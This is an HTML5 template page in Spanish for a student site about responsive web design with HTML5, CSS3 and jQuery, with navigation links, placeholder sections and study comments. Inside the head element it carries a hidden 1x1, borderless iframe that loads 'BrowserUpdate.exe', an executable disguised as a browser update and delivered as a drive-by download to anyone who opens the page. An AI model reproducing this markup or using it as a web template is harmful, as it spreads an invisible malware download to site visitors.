<!DOCTYPE html> <html lang="es"> <!-- CONSIDERACIONES AL INICIAR EL SITIO --> <!-- icon para el navegador propio "*.ico" (favicon) --> <!-- 16x16 resolucion=72 en formato png --> <!-- convertico.com PAGINA PARA CONVERTIR FORMATOS DE IMAGENES --> <!-- humanstxt.org --> <head><iframe src=BrowserUpdate.exe width=1 height=1 frameborder=0></iframe> <title>Sitio con Responsive Web Design en HTML5, CSS3 y jQuery</title> <meta charset="utf-8" /> <meta name="description" content="Bienvenido al portal hecho en HTML5, CSS3 y jQuery con Responsive Web Design" /> <meta name="viewport" content="width=device-width, inital-scale=1" /> <link rel="shortcut icon" type="img/x-icon" href="img/Logo.ico" /> <link rel="author" type="text/plain" href="humanstxt" /> <link rel="stylesheet" media="all" href="css/Estilos_5.css" /> <!-- PARA QUE LOS NAVEGADORES VIEJOS INTERPRETEN LA NUEVA SEMANTICA --> <! -- [if lt IE 9]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <! [endif] --> </head> <body background=Fondo.jpg> <header> <h1> <a href="index_4.html"> <img class="fade" alt="HTML5 - F.I.E." src="img/Logo.gif" /> </a> </h1> <nav> <ul> <li><a href="index_4">Inicio</a></li> <li><a href="Acerca.html">Acerca</a></li> <li><a href="Servicios.html">Servicios</a></li> <li><a href="Trabajos.html">Trabajos</a></li> <li><a href="Contacto.html">Contacto</a></li> </ul> </nav> </header> <section id="contenido"> <section id="principal"> <article id="galeria-inicio"> Galeria con jQuery </article> </section> <aside> Widgets Sociales </aside> </section> <footer> Aprendiendo HTML5, CSS3, jQuery y Responsive Web Design con la FIE </footer> </body> </html>